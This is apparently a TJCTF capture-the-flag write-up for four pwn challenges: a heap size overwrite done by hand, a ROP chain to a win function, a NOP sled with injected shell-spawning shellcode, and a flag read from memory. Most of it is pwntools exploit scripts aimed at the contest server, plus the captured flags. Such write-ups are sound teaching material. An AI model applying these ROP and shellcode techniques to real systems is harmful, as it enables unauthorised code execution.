Heap Challenge
By debugging and reading the source code, you can observe an attack path: changing the size to 0xa0 and then allocating the same size (with 0x98) will print the data 0x20 bytes after the chunk, where the flag should be. tjctf{bby-eap-lol171296386}, exploited mannually with netcat
Ring Opening
A simple ROP:
#!/usr/bin/python3
from pwn import *
gs = '''
b main
continue
'''
elf = context.binary = ELF('./out')
context.terminal = ['tmux', 'splitw', '-hp', '70']
def start():
if args.GDB:
return gdb.debug('./out', gdbscript=gs)
if args.REMOTE:
return remote('tjc.tf', 31457)
else:
return process('./out')
r = start()
r.timeout = 1
#========= exploit here ===================
libc = elf.libc
#0x0000000000401016: ret
poprdi = 0x0040117a
ret = 0x401016
payload = b"A"*0x10
payload += p64(poprdi)
payload += p64(0xdeadbeef)
payload += p64(elf.sym.win)
r.sendline(payload)
#========= interactive ====================
r.interactive()
#tjctf{bby-rop-1823721665as87d86a5}
Sled
A jmp and shellcode easy challenge:
#!/usr/bin/python3
from pwn import *
gs = '''
b main
continue
'''
elf = context.binary = ELF('./out')
context.terminal = ['tmux', 'splitw', '-hp', '70']
def start():
if args.GDB:
return gdb.debug('./out', gdbscript=gs)
if args.REMOTE:
return remote('tjc.tf', 31456)
else:
return process('./out')
r = start()
#========= exploit here ===================
payload = asm('''
mov rdx, 0x401136
call rdx
''')
print(hex(len((payload))))
r.sendline(payload)
payload = b"\x90"*0x20
payload += asm(shellcraft.sh())
r.sendline(payload)
#========= interactive ====================
r.interactive()
#tjctf{bby-shhEellLcodeeeeeaf7af7f66}
WtTwo
You can observe the flag in memory and just send it to print the flag remotely:
#!/usr/bin/python3
from pwn import *
gs = '''
b *main +430
continue
'''
elf = context.binary = ELF('./wttwo')
context.terminal = ['tmux', 'splitw', '-hp', '70']
def start():
if args.GDB:
return gdb.debug('./wttwo', gdbscript=gs)
if args.REMOTE:
return remote('127.0.0.1', 5555)
else:
return process('./wttwo')
r = start()
#========= exploit here ===================
payload = b"t"
payload += b"j"
payload += b"c"
payload += b"t"
payload += b"f"
payload += b"{"
payload += b"w"
payload += b"t"
payload += b"-"
payload += b"t"
payload += b"h"
payload += b"e"
payload += b"-"
payload += b"t"
payload += b"w"
payload += b"o"
payload += b"o"
payload += b"o"
payload += b"o"
payload += b"o"
payload += b"a"
payload += b"s"
payload += b"4"
payload += b"8"
payload += b"%"
payload += b"@"
payload += b"d"
payload += b"f"
payload += b"s"
payload += b"}"
payload += b"A"*(30-len(payload))
print(payload)
r.sendlineafter(b"Guess my flag!!", payload)
#========= interactive ====================
r.interactive()